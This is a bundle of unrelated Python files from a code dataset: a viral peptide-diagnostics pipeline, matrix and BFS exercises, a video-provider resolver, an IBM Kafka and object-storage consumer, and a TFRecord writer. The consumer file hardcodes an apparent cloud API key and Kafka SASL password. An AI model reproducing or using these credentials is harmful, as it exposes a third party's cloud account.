plot_bar_from_window_tuple_list\nfrom get_peptides import print_peptide_aln_from_merged_window_counts\n\nclass DiagnosticPeptides(object):\n \"\"\"\n From metacats output, identify diagnostic peptides\n \"\"\"\n def __init__(self, sensitivity_specificity_threshold=0.95, window_size=15, diagnostic_position_count_threshold=3):\n self.sensitivity_specificity_threshold = sensitivity_specificity_threshold\n self.window_size = window_size\n self.diagnostic_position_count_threshold = diagnostic_position_count_threshold\n\n def get_sensitivity_specificity_threshold(self):\n return self.sensitivity_specificity_threshold\n\n def set_sensitivity_specificity_threshold(self, threshold):\n self.sensitivity_specificity_threshold = threshold\n\n def get_diagnostic_position_count_threshold(self):\n return self.diagnostic_position_count_threshold\n\n def set_diagnostic_position_count_threshold(self, threshold):\n self.diagnostic_position_count_threshold = threshold\n\n def get_window_size(self):\n return self.window_size\n\n def set_window_size(self, size):\n self.window_size = size\n\n def metacats_to_diagnostic_peptides(self, alignment, input_directory, target_file_suffix, output_directory):\n # prepare directories for output files\n try:\n os.mkdir(output_directory + '/sensitivity_specificity')\n output_directory_ss = output_directory + '/sensitivity_specificity/'\n\n os.mkdir(output_directory + '/sliding_windows')\n output_directory_sliding = output_directory + '/sliding_windows/'\n\n os.mkdir(output_directory + '/graphs')\n output_directory_graphs = output_directory + '/graphs/'\n\n os.mkdir(output_directory + '/peptides')\n output_directory_peptides = output_directory + '/peptides/'\n except IOError:\n print(\"directory exists\")\n\n aln = MolSeqCollection.parse(alignment, is_aligned=True, remove_gaps=False, allow_duplicate_labels=True)\n alignment_length = aln.get_length()\n\n for file in os.listdir(input_directory):\n filename = os.fsdecode(file)\n if filename.endswith(target_file_suffix):\n print(\"\\n\" + filename)\n\n # remove suffix from filename\n filename_input = filename[: -len(target_file_suffix)]\n\n print(\"\\nappending sensitivity and specificity to metacats file\")\n filename_ss = filename_input + \"_sensitivity_specificity\"\n metacats_parser.append_sensitivity_specificity(input_directory + filename, output_directory_ss + filename_ss)\n\n print(\"\\nfiltering sensitivity and specificity file by threshold \" + str(self.sensitivity_specificity_threshold))\n sensitivity_index = 7\n specificity_index = 8\n filename_ss_filtered = filename_ss + str(self.sensitivity_specificity_threshold).replace(\".\", \"\") # 0.95 -> 095\n position_list = metacats_parser.filter_metacats_by_threshold(output_directory_ss + filename_ss,\n output_directory_ss + filename_ss_filtered, sensitivity_index, specificity_index, self.sensitivity_specificity_threshold)\n\n print(\"\\nusing a sliding window of size \" + str(self.window_size) + \", counting the number of diagnostic positions in each window\")\n filename_ss_filtered_window_position_count = filename_ss_filtered + \"_window_position_counts\"\n all_windows_list = count_targets_in_sliding_windows_filter_by_threshold(position_list, alignment_length,\n self.window_size,\n output_directory_sliding + filename_ss_filtered_window_position_count)\n\n print(\"\\nfiltering sliding windows by threshold \" + str(self.diagnostic_position_count_threshold))\n filename_ss_filtered_window_position_count_threshold = filename_ss_filtered + \"_window_position_counts_equal_larger_\" + str(self.diagnostic_position_count_threshold)\n filtered_windows_list = count_targets_in_sliding_windows_filter_by_threshold(position_list, alignment_length,\n self.window_size,\n output_directory_sliding + filename_ss_filtered_window_position_count_threshold, self.diagnostic_position_count_threshold)\n\n print(\"\\nmerging filtered sliding windows with contiguous start positions\")\n filename_ss_filtered_window_position_count_threshold_merged_windows = filename_ss_filtered_window_position_count_threshold\n merge_contiguous_windows(filtered_windows_list, self.window_size, alignment_length, output_directory_sliding + filename_ss_filtered_window_position_count_threshold_merged_windows)\n\n print(\"\\nplotting counts of diagnostic positions in sliding windows\")\n x_min = 0\n x_max = alignment_length\n y_min = 0\n y_max = 15\n xticks = 2000\n plot_bar_from_window_tuple_list(all_windows_list, output_directory_graphs + filename_ss_filtered + \".png\", x_min, x_max, y_min, y_max, xticks, self.diagnostic_position_count_threshold)\n\n print(\"\\ngetting diagnostic peptide alignments\")\n print_peptide_aln_from_merged_window_counts(alignment, output_directory_sliding + filename_ss_filtered_window_position_count_threshold_merged_windows, output_directory_peptides)\n print(\"-------------------------------------------------------------------------------------------------\")\n\n def get_diagnostic_sites_in_range(self, infile, outfile, start, end):\n with open(infile, 'r') as in_file, open(outfile, 'w') as out_file:\n count = 0\n first = True\n for line in in_file:\n line = line.strip()\n\n if line:\n if first:\n first = False\n out_file.write(line + '\\n')\n else:\n position = int(line.split('\\t')[0])\n if position >= start and position <= end:\n out_file.write(line + '\\n')\n count += 1\n print('# diagnostic sites found ', count)\n return\n\n\nif __name__ == '__main__':\n\n\n corona_aln = '/Users/yuzhang/Documents/2019nCov/evolution/vipr_gisaid_ncov_full_genomes_20200306_cdhit_1_plus_refs_blast_Richard_cdhit_098_fft_trimmed.fasta'\n input_directory = '/Users/yuzhang/Documents/2019nCov/diagnosis/'\n target_file_suffix = '.tsv'\n output_directory = '/Users/yuzhang/Documents/2019nCov/diagnosis/'\n dp = DiagnosticPeptides()\n dp.set_sensitivity_specificity_threshold(1.0)\n dp.set_diagnostic_position_count_threshold(8)\n dp.metacats_to_diagnostic_peptides(corona_aln, input_directory, target_file_suffix, output_directory)\n '''\n dp = DiagnosticPeptides()\n dp.get_diagnostic_sites_in_range('/Users/yuzhang/Documents/2019nCov/diagnosis/window15_threshold8_ss_099/sensitivity_specificity/ncov_subtree_vs_sars_pre2016_subtree_sensitivity_specificity',\n '/Users/yuzhang/Documents/2019nCov/diagnosis/CDC_primers/2019-nCoV_N1-P_diagnostic_sites.txt', 28956, 28979)\n dp.get_diagnostic_sites_in_range('/Users/yuzhang/Documents/2019nCov/diagnosis/window15_threshold8_ss_099/sensitivity_specificity/ncov_subtree_vs_sars_pre2016_subtree_sensitivity_specificity',\n '/Users/yuzhang/Documents/2019nCov/diagnosis/CDC_primers/2019-nCoV_N2-P_diagnostic_sites.txt', 29835, 29857)\n dp.get_diagnostic_sites_in_range('/Users/yuzhang/Documents/2019nCov/diagnosis/window15_threshold8_ss_099/sensitivity_specificity/ncov_subtree_vs_sars_pre2016_subtree_sensitivity_specificity',\n '/Users/yuzhang/Documents/2019nCov/diagnosis/CDC_primers/2019-nCoV_N3-P_diagnostic_sites.txt', 29351, 29374)\n\n\n EV_099_aln = '/Users/yuzhang/Documents/Enterovirus_diagnosis/cd-hit_results/enterovirus_diagnosis_target_types_complete_human_polyproteins_subtract_patent_385_cdhit_099_E-INS-i.fasta'\n input_directory = '/Users/yuzhang/Documents/Enterovirus_diagnosis/testing/'\n target_file_suffix = '.tsv'\n output_directory = '/Users/yuzhang/Documents/Enterovirus_diagnosis/testing/'\n dp = DiagnosticPeptides()\n dp.metacats_to_diagnostic_peptides(EV_099_aln, input_directory, target_file_suffix, output_directory)\n '''\n","sub_path":"diagnostic_peptides.py","file_name":"diagnostic_peptides.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"411345525","text":"class RangeSumMatrix:\r\n def __init__(self, matrix):\r\n self.res = []\r\n self.n = len(matrix)\r\n self.m = len(matrix[0])\r\n\r\n self.res = [[0] * self.m for i in range(self.n)]\r\n\r\n for i0 in range(self.n):\r\n for j0 in range(self.m):\r\n # res holds the sum from matrix[i0][j0] to matrix[n][m]\r\n i = self.n - 1 - i0\r\n j = self.m - 1 - j0\r\n self.res[i][j] = matrix[i][j]\r\n if (i == self.n - 1 and j == self.m - 1): continue\r\n if (i != self.n - 1):\r\n self.res[i][j] += self.res[i + 1][j]\r\n if (j != self.m - 1):\r\n self.res[i][j] += self.res[i][j + 1]\r\n if (i != self.n - 1 and j != self.m - 1):\r\n self.res[i][j] -= self.res[i + 1][j + 1]\r\n\r\n return None\r\n\r\n def total(self, row0, col0, row1, col1):\r\n s = self.res[row0][col0]\r\n if (col1 != self.m - 1):\r\n s -= self.res[row0][col1 + 1]\r\n\r\n if (row1 != self.n - 1):\r\n s -= self.res[row1 + 1][col0]\r\n\r\n if (col1 != self.m - 1 and row1 != self.n - 1):\r\n s += self.res[row1 + 1][col1 + 1]\r\n return s","sub_path":"Q790_Range_Query_on_Two_Dimensional_List.py","file_name":"Q790_Range_Query_on_Two_Dimensional_List.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349989439","text":"# 2개 확산\n# 오후 5:18 2021-05-03\n# type : bfs\n# summary\n# willbevisited와 매트릭스로 벽이 아님에도 확산되지 않음을 판별하여 전체확산 판별\n# 전체확산 가능하다면, bfs가 가졌된 최대 비용을 따로 저장하여 출력\n\n# lesson 1 ; 1개의 costmatrix에 대해서 2개가 작동하는데, 최소값으로 갱신시켜라!\n# 처음에는 목수의 미로탈출 풀었을 때처럼 2개씩 선언했는데, 최소값 갱신 방법으로 1개에 대해서 처리하면\n# 2개의 비용매트릭스에 대해서 추후 좌표별 최소값을 갱신과정 간소화가능\n# 무엇보다 목수의 미로탈출도 이렇게 가능할듯, \n\n# tcp 1 ; 만약 격리된 두 공간에 각각 디퓨져가 있는 경우, 한쪽 bfs의 willbevisited만 남아서 문제발생\n# Sol) 공통 visited를 쓰되, 2번까지 방문 허용하고 나중에 1,2인 경우 제외해서 완전방문 판단\n# 이렇게 하면 기본적으론 1개 bfs내에서도 서로 다른 접근으로 같은 좌표 방문시 비용이 잘못갱신됨\n# sol) 종합 visited를 만들자.\n\nimport sys\nfrom collections import deque\n\nglobal N,M\nglobal matrix, willbevisited, totalwillbevisited,costMatrix\nglobal maxCost\n\n# renewed costmatrix by two bfs, each maxcost of bfs is not valid\n# so we neeed new function\ndef findMaxCost():\n global N,M\n global costMatrix\n global maxCost\n\n maxCost=0\n for r in range(N):\n for c in range(M):\n if(costMatrix[r][c]==' '): pass\n elif(costMatrix[r][c]>maxCost):\n maxCost=costMatrix[r][c]\n\ndef check_PerfectDiffuse():\n global matrix,totalwillbevisited\n\n for r,row in enumerate(totalwillbevisited):\n for c, item in enumerate(row):\n if(item == 0 and matrix[r][c] !=1):\n return 0\n return 1\n\ndef bfs_deffuser(v):\n global N,M\n global matrix, willbevisited, totalwillbevisited,costMatrix\n global maxCost\n q=deque()\n cost=0\n q.append((v[0],v[1],cost))\n\n while(q):\n curR, curC, curCost = q.popleft()\n # print(curR,curC)\n totalwillbevisited[curR][curC]=1\n willbevisited[curR][curC]=1\n\n # 초기 상태면 일단 할당, 초기상태 아니면 비교 후 대입\n if(costMatrix[curR][curC]==' '):\n costMatrix[curR][curC]=curCost\n else:\n if(curCost(N-1) or adjC<0 or adjC>(M-1)): continue\n\n if(matrix[adjR][adjC]==1): continue\n\n if(willbevisited[adjR][adjC]==1): continue\n else:\n totalwillbevisited[adjR][adjC]=1\n willbevisited[adjR][adjC]=1\n q.append((adjR,adjC,cost))\n\nif __name__==\"__main__\":\n N,M = map(int, sys.stdin.readline().split())\n \n matrix=[]\n coord_diffuser=[]\n\n for r in range(N):\n row=list(map(int, sys.stdin.readline().split()))\n matrix.append(row)\n\n for c,item in enumerate(row):\n if(item == 2):\n coord_diffuser.append((r,c))\n \n costMatrix=[[' ']*M for _ in range(N)]\n totalwillbevisited=[[0]*M for _ in range(N)]\n\n for v in coord_diffuser:\n willbevisited=[[0]*M for _ in range(N)]\n bfs_deffuser(v)\n # print(*willbevisited, sep='\\n')\n\n # for row in costMatrix:\n # print(' '.join(map(str,row)))\n\n findMaxCost()\n # print(maxCost)\n\n if(check_PerfectDiffuse()):\n print(maxCost)\n else:\n print(-1)\n","sub_path":"PSrecords_python/PSpool/skm/210503deffuser/04Twospread.py","file_name":"04Twospread.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"90285463","text":"# -*- coding: utf-8 -*-\r\nimport re\r\n\r\nfrom Lib.RequestHelper import requestHelper\r\n\r\n\r\n# Internal dictionary of \"mostly\" supported providers, each key is a provider name, each value is a\r\n# set of variant names for each provider. All these variants come up in the URLs...\r\n_SUPPORTED_PROVIDERS = {\r\n 'VIDEOZOO.ME': set(('videozoo.me', 'videozoome', 'videozoo')),\r\n 'PLAY44.NET': set(('play44.net', 'play44net', 'play44')),\r\n 'EASYVIDEO.ME': set(('easyvideo.me', 'easyvideome', 'easyvideo')),\r\n 'PLAYBB.ME': set(('playbb.me', 'playbbme', 'playbb')),\r\n 'PLAYPANDA.NET': set(('playpanda.net', 'playpandanet', 'playpanda')),\r\n 'VIDEOWING.ME': set(('videowing.me', 'videowingme', 'videowing'))\r\n}\r\n# Resolving not available for these right now, they need to be researched on how to solve:\r\n# 'cheesestream.com', '4vid.me', 'video66.org', 'videobug.net', 'videofun.me', 'vidzur.com'.\r\n\r\n\r\ndef getEpisodeProviders(api, episodeID):\r\n '''\r\n :returns: A dict where each key is a provider name and each value is a list of\r\n lists of stream URLs from that same provider.\r\n \r\n Usually each provider list has a single stream list, but in some rare cases there's more than\r\n one set of streams for the same provider.\r\n '''\r\n requestHelper.setAPISource(api)\r\n requestHelper.delayBegin()\r\n jsonData = requestHelper.routeGET('/GetVideos/' + episodeID)\r\n requestHelper.delayEnd(1000)\r\n\r\n if not jsonData:\r\n return None\r\n\r\n if isinstance(jsonData[0], dict):\r\n # Special-case for animeplus, URLs might come inside one dictionary each provider.\r\n providerURLs = (providerURL['url'] for providerURL in jsonData)\r\n elif isinstance(jsonData[0], list):\r\n # Or the JSON data is a list of lists (sometimes w/ mixed providers in the same list...).\r\n providerURLs = (url for urlList in jsonData for url in urlList)\r\n else:\r\n providerURLs = jsonData # A list of single providers?\r\n\r\n # Assume the video parts of the same provider will be in order (eg. easyvideo part 1, easyvideo part 2 , 3 etc.).\r\n\r\n providers = { } # Parent dict of providers, this is what's returned.\r\n lastURLs = [ ]\r\n lastProvider = ''\r\n\r\n for url in providerURLs:\r\n # Try to get the provider name from the URL to see if we support resolving it.\r\n if url.startswith('http://'):\r\n tempURL = url.replace('http://', '')\r\n elif url.startswith('https://'):\r\n tempURL = url.replace('https://', '')\r\n\r\n providerName = next(\r\n (\r\n key\r\n for word in tempURL.split('.')\r\n for key in _SUPPORTED_PROVIDERS.iterkeys() if word in _SUPPORTED_PROVIDERS[key]\r\n ),\r\n None\r\n )\r\n if not providerName:\r\n continue # It's not a supported provider (or we failed finding its name).\r\n\r\n # Accummulate consecutive URLs from the same provider in a list, until the provider name changes.\r\n if providerName != lastProvider:\r\n if lastURLs: # Store the list in the dict, if it has any items.\r\n if lastProvider in providers:\r\n providers[lastProvider].append(lastURLs) # In case of non-consecutive lists of the same provider.\r\n else:\r\n providers[lastProvider] = [ lastURLs ]\r\n lastURLs = [ ]\r\n lastProvider = providerName\r\n\r\n lastURLs.append(url)\r\n\r\n # Flatten the 'providers' dict with a new key for each URL-list of the same provider.\r\n # providers[videozoo] = [[...], [...], [...]] becomes providers[videozoo][...], providers[videozoo2][...], etc.\r\n allProviders = {\r\n (providerName if index == 1 else providerName + ' (' + str(index) + ')'): urlList\r\n for providerName in providers.iterkeys()\r\n for index, urlList in enumerate(providers[providerName], 1) \r\n }\r\n return allProviders if allProviders else None\r\n\r\n\r\ndef resolveProviderURL(providerURL):\r\n '''\r\n Tries to resolve a provider URL into a stream.\r\n '''\r\n try:\r\n temp = None\r\n requestHelper.delayBegin()\r\n r = requestHelper.GET(providerURL)\r\n if r.ok:\r\n html = r.text\r\n if 'var video_links' in html:\r\n # Try the generic videozoo \\ play44 resolve first:\r\n temp = re.findall(r'''var video_links.*?['\"]link['\"]\\s*?:\\s*?['\"](.*?)['\"]''', html, re.DOTALL)\r\n else:\r\n # Try variants (found sometimes in Playpanda.net etc.):\r\n temp = re.findall(r'''{\\s*?url\\s*?:\\s*?['\"](.*?)['\"]''', html, re.DOTALL)\r\n if not temp:\r\n temp = re.findall(r'''file\\s*?:\\s*?['\"](.*?)['\"]''', html, re.DOTALL)\r\n requestHelper.delayEnd(1000) # Sleep this thread a little before the next request, if necessary.\r\n if temp:\r\n return temp[0].replace(r'\\/', r'/') # Unescape any potential escaped JS slashes.\r\n except:\r\n pass\r\n\r\n return None","sub_path":"Lib/Providers.py","file_name":"Providers.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"323384126","text":"##Market_Index_Tracker.py - Michael Rist - Student ID 250996815\n#This service publishes the performance of key market indices for the previous day.\n#.\n\n#import libraries\nimport schedule\nimport time\nimport yfinance as yf\nimport datetime\nimport json\nimport ibm_boto3\nfrom ibm_botocore.client import Config, ClientError\nimport asyncio\nimport sys\nfrom confluent_kafka import Producer, Consumer, KafkaException\n#from event_streams_access import ProducerTask, EventStreamsDriver, ConsumerTask\n\n#Global Variables\n\n#for Object storage\nCOS_ENDPOINT = \"https://s3.us-east.cloud-object-storage.appdomain.cloud\"\nCOS_API_KEY_ID = \"O6M_tX17yK4Y-8o4RXI6ijQ5BRisJkSJvdUCcamgBt49\"\nCOS_AUTH_ENDPOINT = \"https://iam.cloud.ibm.com/identity/token\"\nCOS_RESOURCE_CRN = \"crn:v1:bluemix:public:cloud-object-storage:global:a/c5dc1427dfaa4a80894540effca9ecdb:58e73feb-1eff-4601-a9f7-4cceb8a81244::\"\ncos=ibm_boto3.resource(\"s3\",ibm_api_key_id=COS_API_KEY_ID,ibm_service_instance_id=COS_RESOURCE_CRN,ibm_auth_endpoint=COS_AUTH_ENDPOINT,config=Config(signature_version=\"oauth\"),endpoint_url=COS_ENDPOINT)\n\n\n#Main function opens a socket and, using helper function, sends data prior to closing the socket connection.\ndef main():\n #get current date\n #currDate=datetime.date.today()\n\n #initial call to push data to object storage (upon service startup)\n #pull_marketIndexTracker()\n\n #instantiate consumer eventstreamsdriver and run\n listen_eventMessage()\n\n\n#function retreives the market index data from object storage\ndef pull_marketIndexTracker():\n #markIndexJson=get_item(\"mc-objstore\", \"mark_inx_trkr.json\")\n try:\n markIndexJson = cos.Object(\"mc-objstore\", \"Curr_trkr.json\").get()\n print('Accessing Object Storage, retrieving: Curr_trkr.json')\n print()\n print(\"File Contents: {0}\".format(markIndexJson[\"Body\"].read()))\n\n return markIndexJson\n\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve file contents: {0}\".format(e))\n\n#get_buckets() function\n#retrieves a list of available buckets in object storage\ndef get_buckets():\n print(\"Retrieving list of buckets\")\n try:\n buckets = cos.buckets.all()\n for bucket in buckets:\n print(\"Bucket Name: {0}\".format(bucket.name))\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve list buckets: {0}\".format(e))\n\n#gets contents list of files in buckets\ndef get_bucket_contents(bucket_name):\n print(\"Retrieving bucket contents from: {0}\".format(bucket_name))\n try:\n files = cos.Bucket(bucket_name).objects.all()\n for file in files:\n print(\"Item: {0} ({1} bytes).\".format(file.key, file.size))\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve bucket contents: {0}\".format(e))\n\n#gets a specific item / file from object storage bucket\ndef get_item(bucket_name, item_name):\n print(\"Retrieving item from bucket: {0}, key: {1}\".format(bucket_name, item_name))\n try:\n file = cos.Object(bucket_name, item_name).get()\n print(\"File Contents: {0}\".format(file[\"Body\"].read()))\n return file\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve file contents: {0}\".format(e))\n\n#creates an instance of EventStreamsDriver for the consumer and\ndef listen_eventMessage():\n driver = EventStreamsDriver('Currency_Tracker','Currency_Tracker',False)\n driver.run_task()\n\n#code creates producertask\nclass ProducerTask(object):\n def __init__(self, conf, topic_name):\n self.topic_name = topic_name\n self.producer = Producer(conf)\n self.counter = 0\n self.running = True\n\n def stop(self):\n self.running = False\n\n def on_delivery(self, err, msg):\n if err:\n print('Delivery report: Failed sending message {0}'.format(msg.value()))\n print(err)\n # We could retry sending the message\n else:\n print('Message produced, offset: {0}'.format(msg.offset()))\n\n def run(self):\n self.producer.produce(self.topic_name, \"Hello! This is a message! 2\", callback=self.on_delivery)\n self.producer.poll(0)\n\n self.producer.flush()\n\n#code creates consumertask\nclass ConsumerTask(object):\n\n def __init__(self, conf, topic_name):\n self.consumer = Consumer(conf)\n self.topic_name = topic_name\n self.running = True\n self._observers = []\n\n def stop(self):\n self.running = False\n\n def print_assignment(self, consumer, partition):\n print('Assignment - subscribing to topic: ', partition)\n\n def register_observer(self, observer):\n self._observers.append(observer)\n\n def notify_observers(self, *args, **kwargs):\n for observer in self._observers:\n observer.notify(self, *args, **kwargs)\n\n def run(self):\n self.consumer.subscribe([self.topic_name], on_assign=self.print_assignment)\n\n try:\n while True:\n msg = self.consumer.poll(1)\n if msg is None:\n continue\n if msg.error():\n raise KafkaException(msg.error())\n else:\n sys.stderr.write('%% %s [%d] at offset %d with key %s:\\n' %\n (msg.topic(), msg.partition(), msg.offset(),\n str(msg.key())))\n #print(msg.value())\n self.notify_observers(msg.topic())\n\n #could add something here that will tell the widget / UI to go to Object Storage\n except KeyboardInterrupt:\n sys.stderr.write(\"%% Aborted by user\\n\")\n finally:\n self.consumer.unsubscribe()\n self.consumer.close()\n\n#code creates an instance of eventstreamsdriver\nclass EventStreamsDriver(object):\n def __init__(self, topic_name, service_name, producer):\n self.consumer = None\n self.producer = None\n\n if producer:\n self.run_producer = True\n else:\n self.run_producer = False\n\n self.topic_name = topic_name\n self.base_config = {\n 'bootstrap.servers': 'broker-1-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-5-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-4-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-2-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-3-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-0-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093',\n 'security.protocol': 'SASL_SSL',\n 'sasl.mechanisms': 'PLAIN',\n 'sasl.username': 'token',\n 'sasl.password': 'nbHuMTLnLi-rmmhP22gUQSUuExarXsEpF8z49FSBLJRj',\n 'api.version.request': True,\n 'broker.version.fallback': '0.10.2.1',\n 'log.connection.close' : False\n }\n self.prod_config = {\n 'client.id': service_name + '-producer'\n }\n self.cons_config = {\n 'client.id': service_name + '-consumer',\n 'group.id': 'money-cloud-services'\n }\n\n for key in self.base_config:\n self.cons_config[key] = self.base_config[key]\n self.prod_config[key] = self.base_config[key]\n\n def run_task(self):\n # tasks = []\n if self.run_producer:\n self.producer = ProducerTask(self.prod_config, self.topic_name)\n self.producer.run()\n # tasks.append(asyncio.ensure_future(self.producer.run()))\n else:\n self.consumer = ConsumerTask(self.cons_config, self.topic_name)\n observer=Observer(self.consumer)\n self.consumer.run()\n\n#in conjunction with the code in consumertask and eventstreamsdriver, Observer allows 'notify' upon reciept of a message and triggers our action\nclass Observer(object):\n def __init__(self, ConsumerTask):\n ConsumerTask.register_observer(self)\n\n def notify(self, ConsumerTask, *args, **kwargs):\n #print('Got', args, kwargs, 'From', ConsumerTask)\n if(args[0]=='Currency_Tracker'):\n print(\"Message Recieved from: \", args[0])\n print()\n pull_marketIndexTracker()\n print()\n print(\"-------------------------------------------------------\")\n\n\n\nmain() #start program\n","sub_path":"consumer_currency.py","file_name":"consumer_currency.py","file_ext":"py","file_size_in_byte":8673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"84872410","text":"import numpy as np\nimport tensorflow as tf\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n\n\ndef normalize_image(img):\n img_norm = img - np.min(img)\n img_norm = img_norm / np.max(img_norm) * 255\n img_norm = img_norm.astype(np.uint8)\n\n # img_norm = cv2.normalize(img, None, 255, 0, cv2.NORM_MINMAX)\n\n return img_norm\n\n\ndef write_tfrecord(image_path):\n tfr_writer = tf.python_io.TFRecordWriter('./denoise.tfrecords')\n\n for folder in os.listdir(image_path):\n mat_file = os.path.join(image_path, folder, 'GTnoIntep.mat')\n raw = sio.loadmat(mat_file)['GTnoIntep']\n\n mat_noise_file = os.path.join(image_path, folder, '%s_noise.mat' % folder)\n raw_noise = sio.loadmat(mat_noise_file)['add_noise']\n\n for index in range(raw.shape[2]):\n # data: (192, 240) complex128, data_noise: (192, 240) float64\n data = np.squeeze(raw[:, :, index])\n data_noise = np.squeeze(raw_noise[:, :, index])\n\n data_real = np.real(data).astype(np.float32).reshape((data.shape[0], data.shape[1], 1))\n data_imag = np.imag(data).astype(np.float32).reshape((data.shape[0], data.shape[1], 1))\n data = np.concatenate((data_real, data_imag), axis=2)\n\n # data = np.abs(data)\n data_noise = data_noise.astype(np.float32)\n data_noise = normalize_image(data_noise)\n\n example = tf.train.Example(\n features=tf.train.Features(\n feature={\n 'label': tf.train.Feature(float_list=tf.train.FloatList(value=data.flatten().tolist())),\n 'image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[data_noise.tobytes()])),\n 'value': tf.train.Feature(int64_list=tf.train.Int64List(value=[1]))\n }))\n\n tfr_writer.write(example.SerializeToString())\n\n tfr_writer.close()\n\n # small test (optional)\n for serialized_example in tf.python_io.tf_record_iterator('./denoise.tfrecords'):\n example = tf.train.Example()\n example.ParseFromString(serialized_example)\n\n data = example.features.feature['label'].float_list.value\n data_noise = example.features.feature['image'].bytes_list.value\n value = example.features.feature['value'].int64_list.value\n\n # print(data)\n # print(data_noise)\n\n\ndef read_tfrecord():\n # specify `num_epochs` times for generating an `OutOfRange` error\n filename_q_input = tf.train.string_input_producer(['./denoise.tfrecords'], num_epochs=1, shuffle=False)\n\n tfr_reader = tf.TFRecordReader()\n k, v = tfr_reader.read(filename_q_input)\n\n features = {\n 'label': tf.FixedLenFeature([192 * 240 * 2], tf.float32),\n 'image': tf.FixedLenFeature([], tf.string),\n 'value': tf.FixedLenFeature([], tf.int64)\n }\n\n parsed_features = tf.parse_single_example(v, features)\n\n data = parsed_features['label']\n data_noise = parsed_features['image']\n data_noise = tf.decode_raw(data_noise, tf.uint8)\n value = parsed_features['value']\n\n return data, data_noise, value\n\n\nif __name__ == '__main__':\n data_dir = 'D:/Temp/amax/jgl-0420/Thrive/data'\n data_dir = 'D:/Dataset/MRI/data'\n\n write_tfrecord(data_dir)\n label, img, val = read_tfrecord()\n\n init = tf.initialize_all_variables()\n\n with tf.Session() as sess:\n # string_input_producer defines a epoch variable, need initialization\n sess.run(tf.local_variables_initializer())\n\n sess.run(init)\n threads = tf.train.start_queue_runners(sess=sess)\n for i in range(10):\n image_noise, image, value = sess.run([img, label, val])\n\n image_noise.shape = 192, 240\n image.shape = 192, 240, 2\n image = image[:, :, 0] + 1j * image[:, :, 1]\n image = np.abs(image)\n print(value)\n\n plt.subplot(121)\n plt.imshow(image)\n plt.subplot(122)\n plt.imshow(image_noise)\n plt.show()\n\n# https://blog.csdn.net/freedom098/article/details/56011858\n# https://blog.csdn.net/u012759136/article/details/52232266\n# https://blog.csdn.net/shenxiaolu1984/article/details/52857437\n# https://zhuanlan.zhihu.com/p/27238630\n# Project thrive_denoise\n","sub_path":"tensorflow/tfrecord.py","file_name":"tfrecord.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5086681","text":"# -*-coding:Latin-1 -*\nclass DictionnaireOrdonne:\n\n\tdef __init__(self, base={},**donnees):\n\n\t\tself._cles=[]\n\t\tself._valeurs=[]\n\n\t\tif type(base) not in (dict, DictionnaireOrdonne):\n\t\t\traise TypeError(\"le type attendu est un dictionnaire usuel ou ordonné\")\n\n\t\tfor cle in base:\n\t\t\tself[cle]=base[cle]\n\n\t\tfor cle in donnees:\n\t\t\tself[cle]=donnees[cle]\n\n\tdef __setitem__(self, cle, valeur):\n\n\t\tif cle in self._cles:\n\t\t\tindice= self._cles.index(cle)\n\t\t\tself._valeurs[indice]=valeur\n\t\telse:\n\t\t\tself._cles.append(cle)\n\t\t\tself._valeurs.append(valeur)\n\tdef __delitem__(self, cle):\n\n\t\tif cle in self._cles:\n\t\t\tindice= self._cles.index()\n\t\t\tdel self._cles[indice]\n\t\t\tdel self._valeurs[indice]\n\t\telse:\n\t\t\traise KeyError(\"le dictionnaire ne contient pa cette cle\")\n\tdef __getitem__(self,cle):\n\t\tif cle not in self._cles:\n\t\t\traise KeyError(\"le dictionnaire ne contient pas la cle {}\".format(cle))\n\t\telse:\n\t\t\tindice=self._cles.index(cle)\n\t\t\treturn self._valeurs[indice]\n\tdef __contains__(self,cle):\n\t\treturn cle in self._cles\n\n\tdef __len__(self):\n\t\treturn len(self._cles)\n\tdef __repr__(self):\n\n\t\tchaine=\"{\"\n\t\tpremier_passage=True\n\t\tfor cle,elt in self.items():\n\t\t\tif not premier_passage:\n\t\t\t\tchaine+=\",\"\n\t\t\telse:\n\t\t\t\tpremier_passage=False\n\t\t\t\tchaine+=repr(cle)+\": \"+repr(elt)\n\t\tchaine+=\"}\"\n\t\treturn chaine\n\tdef keys(self):\n\t\treturn list(self._cles)\n\n\tdef values(self):\n\t\treturn list(self._valeurs)\n\n\tdef items(self):\n\t\tfor i,elt in enumerate(self._cles):\n\t\t\tvaleur=self._valeurs[i]\n\t\t\tyield (elt,valeur)\n\n\tdef sort(self):\n\t\tcle_triees=sorted(self._cles)\n\t\tvaleurs=[]\n\n\t\tif elt in cle_triees:\n\t\t\tvaleur=self[elt]\n\t\t\tvaleurs.append(valeur)\n\n\t\tself._cles=cle_triees\n\t\tself._valeurs=valeurs\n\tdef 